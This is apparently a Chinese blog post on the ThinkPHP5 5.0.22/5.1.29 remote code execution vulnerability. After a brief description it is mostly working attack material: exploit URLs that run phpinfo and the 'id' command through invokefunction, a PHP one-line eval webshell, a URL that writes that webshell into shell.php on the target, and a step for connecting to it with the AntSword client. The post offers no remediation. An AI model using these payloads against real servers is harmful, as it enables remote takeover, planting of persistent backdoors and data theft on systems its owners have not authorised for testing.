ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞描述
Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

验证方式

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=id

img

img

利用方式

  1. 一句话木马
echo '<?php @eval($_POST['hack']);?>' >> shell.php
  1. 上传一句话木马
http://127.0.0.1:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['hack']);?>' >> shell.php
  1. 使用蚁剑连接

http://10.10.10.154/shell.php

img

posted @ 2023-08-29 08:59  kalixcn  阅读(131)  评论(0编辑  收藏  举报